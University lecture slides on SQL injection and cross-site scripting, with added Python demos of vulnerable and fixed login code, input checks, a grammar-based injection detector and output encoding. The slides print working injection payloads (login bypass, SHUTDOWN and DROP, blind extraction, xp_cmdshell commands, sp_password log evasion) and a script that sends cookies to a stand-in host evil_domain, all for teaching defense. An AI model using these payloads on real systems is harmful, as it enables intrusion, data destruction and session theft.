7 2016
https://www.icsd.aegean.gr/t.tzouramanis/courses/[email protected]
SQL Injection
References:
4. https://www.linkedin.com/pulse/why-does-sql-injection-still-work-2015-greg-macpherson
5. https://www.veracode.com/blog/2016/04/why-sql-injection-still-around
6. J. Clarke: SQL Injection Attacks and Defense, 2nd Edition, Syngress, 2012
7. P. Russell: Ethical hacking: Basic Hacking With SQL Injection, WhitePlanet, 2015
Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017
Firewall
Firewall (continued)
The server listens on specific ports behind the firewall, and the firewall leaves only those ports open, e.g.: web server 80, e-mail SMTP server 25, SQL Server 1433, MySQL server 3306, Oracle Net Listener 1521.
Firewalls come as software (e.g. Gauntlet, Firewall-1, Raptor) or as hardware (e.g. Cisco Firewall).
Firewall and hackers
Hackers get through the firewall over the channels it allows: e.g. e-mail attachments, cookies, and HTTP requests (e.g. http://mywebsite/myapp.cgi?acctnum=3).
Firewalls
(e.g. secure web)
Through the web: SQL injection.
SQL injection: the hacker sends SQL into the database through the web application.
Origin: Rain Forest Puppy, 1998.
Jeremiah Grossman: "Rain forest puppy (rfp) is one of the REAL pioneers of the industry who contributed a ton of cutting-edge research that we still use today. You'll also notice that he's a very humble guy who prefers to continue giving back rather than taking the credit he deserves. Welcome back rfp."
SQL injection (example)
The login page of a web application in ASP:
<%
var txt_username = Request.form("text_username");
var txt_password = Request.form("text_password");
var con = Server.CreateObject("ADODB.Connection");
var rso = Server.CreateObject("ADODB.Recordset");
// the two form fields are concatenated straight into the query text: this is the injection point
var str_query = "select * from USERS where username = '" + txt_username + "' and password = '" + txt_password + "';";
rso.open(str_query, con);
if (rso.eof) {
    Response.Write("Invalid login.");
} else {
    Response.Write("Welcome to the database!");
}
%>
The same pattern in a Java servlet:
String sLogin = getParameter("Login");
String sPassword = getParameter("Password");
// request parameters concatenated into the query text
String query = "SELECT member_id, member_level FROM members WHERE member_login='" + sLogin + "' AND member_password='" + sPassword + "'";
Statement stat = connection.createStatement();
ResultSet rs = stat.executeQuery(query);
SQL injection (example, continued)
var sql = "select * from users where username ='" + username + "' and password = '" + password + "'";
Input: username: ttzouram, password: 45dc&vg3
Resulting sql string: select * from users where username = 'ttzouram' and password = '45dc&vg3';
Output: Welcome to the database!
SQL injection (example, continued)
var sql = "select * from users where username ='" + username + "' and password = '" + password + "'";
Input: username: ttzou'ram, password: 45dc&vg3
Resulting sql string: select * from users where username = 'ttzou'ram' and password = '45dc&vg3';
Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server][Line 1: Incorrect syntax near 'ram' /process_login.asp, line 14
The stray quote breaks the statement; the error message itself shows that user input reaches the query unescaped.
SQL injection (example, continued)
var sql = "select * from users where username ='" + username + "' and password = '" + password + "'";
The hacker enters: username: ' or 1=1--  password: anything
Resulting sql string: select * from users where username = '' or 1=1--' and password = 'anything';
Output: every row of users. The hacker is logged in as the first user the query returns, possibly admin.
SQL injection (example, continued)
var sql = "select * from users where username ='" + username + "' and password = '" + password + "'";
The hacker knows a username: username: ' or username='ttzouram'--  password: anything
Resulting sql string: select * from users where username = '' or username='ttzouram'--' and password = 'anything';
The hacker is logged in as ttzouram without knowing the password.
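The login slides above, as an added example in Python (not code from the deck): the same concatenated query run against an in-memory SQLite table, beside a prepared statement with bound parameters, the fix the deck names later. The users table, its two rows and the column names are constructed for the demo, and SQLite stands in for SQL Server (it shares the -- comment syntax the payloads rely on).

```python
import sqlite3

# Constructed sample data standing in for the deck's "users" table (column names assumed).
SAMPLE_USERS = [
    (1, "admin", "s3cret!"),
    (2, "ttzouram", "45dc&vg3"),
]


def make_db():
    """In-memory SQLite database seeded with the constructed users."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    con.commit()
    return con


def login_concatenated(con, username, password):
    """The deck's vulnerable pattern: form input spliced into the SQL text.

    Returns the username of the first matching row, None when nothing matches,
    or an 'SQL error: ...' string when the input breaks the statement
    (the slide's "Incorrect syntax near ..." case).
    """
    sql = ("select * from users where username = '" + username
           + "' and password = '" + password + "'")
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        return "SQL error: " + str(exc)
    return row[1] if row else None


def login_parameterized(con, username, password):
    """The fix: a prepared statement with bound parameters.

    The values travel as data; a quote or comment sequence inside them
    can never change the structure of the query.
    """
    sql = "select * from users where username = ? and password = ?"
    row = con.execute(sql, (username, password)).fetchone()
    return row[1] if row else None


# The deck's four inputs, constructed here as test cases.
CASES = {
    "valid": ("ttzouram", "45dc&vg3"),
    "quote": ("ttzou'ram", "45dc&vg3"),
    "or_1_eq_1": ("' or 1=1--", "anything"),
    "named_user": ("' or username='ttzouram'--", "anything"),
}


def run_demo():
    """Run every case through both logins; returns {case: (concatenated, parameterized)}."""
    con = make_db()
    return {label: (login_concatenated(con, u, p), login_parameterized(con, u, p))
            for label, (u, p) in CASES.items()}


if __name__ == "__main__":
    for label, (unsafe, safe) in run_demo().items():
        print("%-11s concatenated=%r parameterized=%r" % (label, unsafe, safe))
```

With the bound-parameter version every injected input simply fails to match a row, and the quote case no longer produces a database error for the attacker to read.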
SQL injection (example, continued)
var sql = "select * from users where username ='" + username + "' and password = '" + password + "'";
The hacker enters: username: ' and 1 in (select @@version)--  password: anything
Output error: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server][Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright © 1998-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 3) ' to a column of data type int. /process_login.asp, line 14
The error discloses the exact SQL Server and Windows versions! The hacker can then google search for known weaknesses of that server.
SQL injection (example, continued)
username: ' UNION SELECT @@version, NULL --  password: anything
Output: Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Personal Edition on Windows NT 5.0 (Build 2195: Service Pack 4)' to a column of data type int
SQL injection (example, continued)
var sql = "select * from users where username ='" + username + "' and password = '" + password + "'";
The hacker enters: username: ' ;SHUTDOWN--  password: (empty)
This shuts down SQL Server.
Likewise: ' ;DROP Database < >--, ' ;DROP Table < >--, ' ;DELETE FROM < >--, etc.
SQL injection (example, continued)
ZU 0666', 0, 0); DROP DATABASE TABLICE;--
Blind SQL injection
username: ' AND ascii(lower(substring( (SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 108) --
The login succeeds or fails depending on whether the ASCII code of the first character of the first user table's name is greater than 108 (the letter 'l'); nothing from the database is displayed, but the yes/no answer leaks one bit at a time.
Blind SQL injection (time-based)
username: ' AND ascii(lower(substring( (SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 108 WAITFOR DELAY '0:0:5') --
The same comparison, answered through timing instead of page content: when the condition holds, the response is delayed by 5 seconds.
SQL injection (continued)
var sql = "select * from users where username ='" + username + "' and password = '" + password + "'";
1. The hacker enters: username: '; create table foo(a int identity(1,1), b varchar(4000)); insert into foo exec master..xp_cmdshell 'dir'--  password: (empty)
2. Then, as in the error-based example: username: ' or 1 in (select b from foo where a=1)--  password: (empty)
Result: the error message reveals the row with a = 1; repeating with a = 2, a = 3, etc. reads the whole output of dir.
SQL injection (continued)
var sql = "select * from users where username ='" + username + "' and password = '" + password + "'";
3. The hacker enters: username: '; create table foo2(a int identity(1,1), b varchar(4000)); insert into foo2 exec master..xp_cmdshell 'cmd /c net user'--  password: (empty)
4. Then, as before: username: ' or 1 in (select b from foo2 where a=1)--  password: (empty)
Result: the error message reveals the row with a = 1; repeating with a = 2, a = 3, etc. reads the list of Windows users.
SQL injection (continued)
var sql = "select * from users where username ='" + username + "' and password = '" + password + "'";
5. The hacker enters: username: ttz'; exec master..xp_cmdshell 'nslookup dblab1.samos.aegean.gr >c:\fooo.txt'--  password: (empty)
Result: the command output is written to the file foo.
6. The hacker enters: username: ttzouram  password: 12345' or 1=1 or '' = '
Result: this variant, which needs no comment sequence, also applies to Oracle.
SQL injection and Windows Server
With MS SQL's sp_OACreate, sp_OADestroy, sp_OAGetErrorInfo, sp_OAGetProperty, sp_OAMethod the hacker reaches Active Directory and IIS on the Windows Server!
With MS SQL's xp_instance_regaddmultistring, xp_instance_regwrite, xp_instance_regread, xp_regdeletekey, xp_regdeletevalue, xp_regremove the hacker manipulates the registry of the Windows Server!
SQL Server and SQL injection
What makes SQL Server a convenient target:
The comment sequence --.
Several SQL statements can be chained with ;.
Detailed error outputs.
Defending against SQL injection
Two places to defend:
1. The web application.
2. The log file.
SQL injection (defense)
(application side): 1. Validate the input:
a. Reject input that contains known-bad strings (e.g. -- and ;):
function validate_string( input )
    known_bad = array( "select", "insert", "update", "delete", "drop", "shutdown", "--", "'" )
    validate_string = true
    for i = lbound( known_bad ) to ubound( known_bad )
        if ( InStr( 1, input, known_bad(i), vbtextcompare ) <> 0 ) then
            validate_string = false
            exit function
        end if
    next
end function
SQL injection (defense, continued)
(application side): 1. Validate the input:
b. Accept only characters from an allowed set (so that -- and ; cannot get through):
function validate_password( input )
    good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~@#$%^*(){}[]<>,.?"
    validate_password = true
    for i = 1 to len( input )
        c = mid( input, i, 1 )
        if ( InStr( good_password_chars, c ) = 0 ) then
            validate_password = false
            exit function
        end if
    next
end function
SQL injection (defense, continued)
(application side): 1. Validate the input:
c. Escape the single quote by doubling it:
function escape( input )
    input = replace(input, "'", "''")
    escape = input
end function
SQL injection (defense, continued)
(application side): 1. Validate the input:
d. Limit the length of the input and of the column it is stored in. With username declared varchar(12) instead of varchar(256), a long injected string does not fit: '; SHUTDOWN;-- is 14 characters and cannot be stored in varchar(<14).
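The four input checks a-d above, as an added example in Python (not the deck's code): each check applied to the deck's own inputs. Running it also shows two caveats worth knowing: the allowlist on slide b does not contain &, so the deck's earlier sample password 45dc&vg3 is rejected, and both the blocklist and the allowlist reject a legitimate name such as O'Hara, which only the quote-doubling escape handles. The column width 12 passed to fits_column is the varchar(12) from slide d.

```python
# The deck's blocklist (slide a) and allowlist (slide b), reproduced as data.
KNOWN_BAD = ("select", "insert", "update", "delete", "drop", "shutdown", "--", "'")
GOOD_PASSWORD_CHARS = set(
    "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~@#$%^*(){}[]<>,.?"
)


def validate_string(value):
    """Slide a: reject input containing any known-bad token (case-insensitive, like vbtextcompare)."""
    lowered = value.lower()
    return not any(bad in lowered for bad in KNOWN_BAD)


def validate_password(value):
    """Slide b: accept only characters from the allowlist."""
    return all(c in GOOD_PASSWORD_CHARS for c in value)


def escape(value):
    """Slide c: double every single quote so it stays inside the string literal."""
    return value.replace("'", "''")


def fits_column(value, max_len):
    """Slide d: reject input longer than the column it is stored in (e.g. username varchar(12))."""
    return len(value) <= max_len


def check(value, max_len=12):
    """Apply all four checks to one input and report each verdict."""
    return {
        "blocklist": validate_string(value),
        "allowlist": validate_password(value),
        "escaped": escape(value),
        "fits_varchar": fits_column(value, max_len),
    }


# Constructed inputs taken from the deck's slides: legitimate values and injected ones.
SAMPLE_INPUTS = ["ttzouram", "45dc&vg3", "O'Hara", "' or 1=1--", "'; SHUTDOWN;--", "admin'--"]

if __name__ == "__main__":
    for value in SAMPLE_INPUTS:
        print("%-16r %s" % (value, check(value)))
```

No single check is sufficient on its own: the blocklist misses anything not on its list, the allowlist breaks legitimate data, escaping handles quotes but nothing else, and the length limit only stops long payloads; the deck's later slides on prepared statements address the root cause instead.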
SQL injection (defense, continued)
(DBMS side): 2. Remove or disable dangerous stored procedures and packages: xp_cmdshell, xp_regread, xp_resultset (for Oracle: utl_file, dbms_lob, dbms_pipe, dbms_output, utl_http, utl_smtp).
SQL injection (defense, continued)
(DBMS side): 3.
SQL injection (defense, continued)
(application side): 4. Hash the inputs (e.g. on the server) before they are placed in the query; a hex digest contains no quotes or other SQL metacharacters.
$hashUsername = md5($username);
$hashPassword = md5($password);
$link = mysqli_connect('testserver.com', 'root', '', 'testdb');
$sql_query = "SELECT username FROM users WHERE username = '" . $hashUsername . "' AND password = '" . $hashPassword . "'";
// execute the query (the slide's point is that the digest is injection-safe; unsalted md5 is not an acceptable password hash by today's standards)
$result = mysqli_query($link, $sql_query);
SQL injection (defense, continued)
(DBMS side): 5. Keep the DBMS up to date with security patches (see e.g. http://goo.gl/JPtms), so that known bugs are closed.
Second-order SQL injection
A web application lets users register and later change their password.
The hacker registers with: username: admin'--  password: anything
Because the input is escaped, the SQL insert becomes:
insert into users values( 123, 'admin''--', 'anything' )
Second-order SQL injection (continued)
The password-change page escapes its inputs:
username = escape( Request.form("username") );
oldpassword = escape( Request.form("oldpassword") );
newpassword = escape( Request.form("newpassword") );
var rso = Server.CreateObject("ADODB.Recordset");
var sql = "select * from users where username = '" + username + "' and password = '" + oldpassword + "'";
rso.open( sql, cn );
if (rso.EOF)
{
…
Second-order SQL injection (continued)
The SQL that changes the password:
sql = "update users set password = '" + newpassword + "' where username = '" + rso("username") + "'"
rso("username") is the username as read back from the database for the logged-in user, not the escaped form input.
For the hacker's username admin'-- the SQL becomes:
update users set password = 'password' where username = 'admin'--'
The hacker has changed admin's password!
The same problem appears with legitimate names that contain an apostrophe, e.g. O'Hara, because the username coming back from the database is used unescaped.
SQL injection and the log file
If the hacker includes sp_password in the injected input (e.g. username: 'admin'-- sp_password), SQL Server's log file records only:
-- 'sp_password' was found in the text of this event.
-- The text has been replaced with this comment for security reasons.
Script for finding weak passwords (password equal to a dictionary word, equal to the username, or empty)
The script runs on the SQL server and needs a dictionary table dict(word varchar(256)) in master. It reports the logins whose passwords it finds:
select name, word as password from dict inner join sysxlogins on (pwdcompare( word, sysxlogins.password, 0 ) = 1)
union select name, password from sysxlogins where (pwdcompare( name, password, 0 ) = 1)
union select name, null from sysxlogins where password is null;
Detection (figure): web portal, SQL injection examination, server, original database.
Detection (continued): Prepared statements.
SQL-IDS*: detecting SQL injection.
* K. Kemalis and T. Tzouramanis: "SQL-IDS: A Specification-based Approach for SQL-Injection Detection", In Proceedings of the 23rd ACM Symposium on Applied Computing (ACM SAC 2008) - Computer Security Track, Fortaleza, Ceara, Brazil, March 2008.
SQL-IDS (SQL-Injection Detection System), implemented in Java.
The expected structure of the application's SQL queries is specified in EBNF (Extended Backus–Naur Form).
See e.g.: http://savage.net.au/SQL/sql-2003-2.bnf.html
Example SQL query:
SELECT member_id FROM members WHERE (member_login = 'guest' OR member_email = '[email protected]') AND member_password = 'guest';
EBNF specification of the expected login query:
<Query specification> := SELECT <SELECT List> <FROM Clause> <WHERE Clause>
<SELECT List> := <Table Column> ( <COMMA> <Table Column> )
<Table Column> := <IDENTIFIER>
<FROM Clause> := FROM <Table reference>
<Table reference> := <IDENTIFIER>
<WHERE Clause> := WHERE <search condition> AND <search condition>
<search condition> := <Table Column> "=" <STRING_LITERAL>
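The EBNF above, as an added example in Python (not SQL-IDS's code, which is in Java): a tokenizer and recursive-descent parser that accepts exactly the query shape the grammar specifies and rejects everything else, which is the specification-based check SQL-IDS performs. It assumes the parenthesised group in <SELECT List> repeats (the EBNF repetition operator is missing from the extracted slide) and reuses the concatenation from the earlier Java servlet snippet to generate the queries under test.

```python
import re

# Token pattern for the deck's EBNF: keywords, identifiers, comma, "=", and
# SQL string literals ('' inside a literal is an escaped quote).
TOKEN_RE = re.compile(
    r"\s*(?:(?P<KW>SELECT|FROM|WHERE|AND)\b"
    r"|(?P<IDENT>[A-Za-z_][A-Za-z0-9_]*)"
    r"|(?P<COMMA>,)"
    r"|(?P<EQ>=)"
    r"|(?P<STRING>'(?:[^']|'')*')"
    r"|(?P<END>\Z)"
    r"|(?P<OTHER>.))",
    re.IGNORECASE | re.DOTALL,
)


def tokenize(sql):
    """Split the query into (kind, text) tokens; any character outside the grammar's alphabet is an error."""
    tokens, pos = [], 0
    while True:
        m = TOKEN_RE.match(sql, pos)
        kind = m.lastgroup
        text = m.group(kind)
        if kind == "END":
            tokens.append(("END", ""))
            return tokens
        if kind == "OTHER":
            raise SyntaxError("unexpected character %r at offset %d" % (text, pos))
        tokens.append((kind, text.upper() if kind == "KW" else text))
        pos = m.end()


class SpecParser:
    """Recursive-descent parser for the deck's <Query specification> grammar."""

    def __init__(self, sql):
        self.toks = tokenize(sql)
        self.i = 0

    def expect(self, kind, text=None):
        k, t = self.toks[self.i]
        if k != kind or (text is not None and t != text):
            raise SyntaxError("expected %s %s, got %s %r" % (kind, text or "", k, t))
        self.i += 1
        return t

    def query_specification(self):
        # <Query specification> := SELECT <SELECT List> <FROM Clause> <WHERE Clause>
        self.expect("KW", "SELECT")
        cols = self.select_list()
        table = self.from_clause()
        conds = self.where_clause()
        self.expect("END")  # nothing may follow the WHERE clause
        return {"columns": cols, "table": table, "conditions": conds}

    def select_list(self):
        # <SELECT List> := <Table Column> ( <COMMA> <Table Column> )*   (repetition assumed)
        cols = [self.expect("IDENT")]
        while self.toks[self.i][0] == "COMMA":
            self.i += 1
            cols.append(self.expect("IDENT"))
        return cols

    def from_clause(self):
        # <FROM Clause> := FROM <Table reference>, <Table reference> := <IDENTIFIER>
        self.expect("KW", "FROM")
        return self.expect("IDENT")

    def where_clause(self):
        # <WHERE Clause> := WHERE <search condition> AND <search condition>
        self.expect("KW", "WHERE")
        first = self.search_condition()
        self.expect("KW", "AND")
        return [first, self.search_condition()]

    def search_condition(self):
        # <search condition> := <Table Column> "=" <STRING_LITERAL>
        col = self.expect("IDENT")
        self.expect("EQ")
        lit = self.expect("STRING")
        return (col, lit[1:-1].replace("''", "'"))


def parse(sql):
    """Parse a query against the specification; raises SyntaxError if it does not conform."""
    return SpecParser(sql).query_specification()


def matches_specification(sql):
    """SQL-IDS style verdict: True when the query has the expected structure, False otherwise."""
    try:
        parse(sql)
        return True
    except (SyntaxError, IndexError):
        return False


def build_login_query(login, password):
    """The deck's servlet concatenation, reproduced to generate the queries under test."""
    return ("SELECT member_id, member_level FROM members WHERE member_login='"
            + login + "' AND member_password='" + password + "'")
```

A query built from the credentials guest/guest parses; the injected inputs from the earlier slides produce an extra identifier, a stray quote or a semicolon that the grammar has no rule for, so the parse fails and the query is flagged before it reaches the database. Note that an unescaped legitimate quote (O'Hara) is flagged too, which is the same syntax failure the slide with the error message showed, while the escaped form O''Hara parses as a single string literal.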
Timing:
• 0 - 20 milliseconds
• 0.5 milliseconds
Source code analysis tools for finding SQL injection
Commercial: Security AppScan Source Edition, Fortify Source Code Analyzer, CodeSecure, Klocwork Solo.
Free: Graudit, Yet Another Source Code Analyzer (YASCA), Pixy, AppCodeScan, OWASP LAPSE+ Project, Microsoft Source Code Analyzer for SQL Injection, Microsoft Code Analysis Tool .NET (CAT.NET), RIPS - A Static Source Code Analyzer for Vulnerabilities in PHP Scripts, CodePro AnalytiX, Teachable Static Analysis Workbench.
Blind SQL injection tool: BSQL.
Cross Site Scripting Attacks
XSS
OWASP (Open Web Application Security Project) (2007)
XSS
3 types:
• DOM Based: the attack works through the Document Object Model of the page.
• Reflected (non-persistent): the payload passes through the server and comes back in the response.
• Stored (persistent): the payload is saved on the server (e.g. in a forum).
• DOM based: the page's own javascript processes the attacker-controlled data; the server is not involved.
• Reflected: the injected data is sent to the server and returned in the response.
• Stored: the injected data is stored on the server, e.g. in a forum post, and served to every visitor.
Stored XSS scenario (figure, steps 1-6; the labels mention the URL and the server).
Reflected XSS scenario (figure): 1. The victim follows a link, e.g. received by e-mail; the vulnerable page reads its input from $_GET or $_REQUEST. 2. The server returns the injected data in its response. 3. The script runs in the browser in the security context of the site (figure steps 2, 5, 6).
DOM-based XSS scenario (figure, steps 1-6).
Why XSS?
XSS demo*
* : " ", , , . , 2008.
Demo application: a forum with users and posts.
Tools used: Apache Web Server, mysql-essential, php, phpMyAdmin, Javascript.
Demo: a pop up.
The injected script: <script>document.location ='http://evil_domain/steal.php?cookies=' + document.cookie</script>
The cookies reach steal.php as a GET parameter.
<script>document.location='http://evil_domain/steal.php?cookies=' + document.cookie</script>
Click!
Script inside steal.php:
"refresh"
Countermeasures from the literature
• Dynamic data tainting [1]: sensitive data (cookies, DOM contents) is tainted and tracked through the browser's javascript engine, and its transfer to a third party is blocked.
• Noxes [2]: a client-side web proxy that controls outgoing HTTP connections; it uses rules on the requested links and the HTTP Referrer to decide which connections to allow.
* The HTTP Referrer check is heuristic.
References:
[1] Vogt P., Nentwich F., Jovanovic N., Kirda E., Kruegel C., Vigna G.: Cross-Site Scripting Prevention with Dynamic Data Tainting and Static Analysis, Proc. Network and Distributed System Security Symposium, San Diego, 2007
[2] Kirda E., Kruegel C., Vigna G., Jovanovic N.: Noxes: A Client-Side Solution for Mitigating Cross-Site Scripting Attacks, Proc. 21st Annual ACM Symposium on Applied Computing, France, 2006
XSS defenses
• Server side: keep the server up to date (security patches).
• Client side: disable javascript, cookies and similar features where they are not needed.
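The forum demo and the defenses above, as an added example in Python (not the deck's PHP forum): the stored post rendered verbatim, as the demo forum does, beside the same post with output encoding, plus a check for live <script> tags in rendered HTML and a Set-Cookie header with HttpOnly, which keeps document.cookie (what the deck's payload reads) from returning the session id. The sample posts are constructed, and the cookie name PHPSESSID is PHP's default, assumed here.

```python
import html
import re

# Constructed forum posts: a benign one and one carrying the deck's cookie-stealing payload.
SAMPLE_POSTS = [
    "Hello forum, nice to be here",
    "<script>document.location='http://evil_domain/steal.php?cookies=' + document.cookie</script>",
]

# Any opening <script ...> tag left alive in the output is a stored-XSS finding.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_post_unsafe(post):
    """The demo forum's behaviour: the post body is written into the page verbatim."""
    return '<div class="post">' + post + "</div>"


def render_post_safe(post):
    """Output encoding: <, >, &, and quotes become entities, so the browser shows the payload as text."""
    return '<div class="post">' + html.escape(post, quote=True) + "</div>"


def contains_active_script(rendered_html):
    """Detection check for rendered pages: is there still a live <script> tag?"""
    return SCRIPT_TAG.search(rendered_html) is not None


def session_cookie_header(session_id):
    """Set-Cookie header for the (assumed) PHP session cookie with HttpOnly set,
    so that document.cookie, which the payload relies on, cannot read the session id."""
    return "Set-Cookie: PHPSESSID=%s; HttpOnly; Secure; SameSite=Lax" % session_id


def audit(posts):
    """Render every post both ways; returns {post index: (unsafe_has_script, safe_has_script)}."""
    return {i: (contains_active_script(render_post_unsafe(p)),
                contains_active_script(render_post_safe(p)))
            for i, p in enumerate(posts)}


if __name__ == "__main__":
    for i, verdict in audit(SAMPLE_POSTS).items():
        print("post %d: live script unsafe=%s safe=%s" % (i, verdict[0], verdict[1]))
    print(session_cookie_header("constructed-session-id"))
```

Output encoding removes the stored payload's effect entirely, and HttpOnly limits the damage of any script that still runs: the cookie is sent to the server as usual but is invisible to document.cookie, so the steal.php request carries nothing useful.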
SQL injection and XSS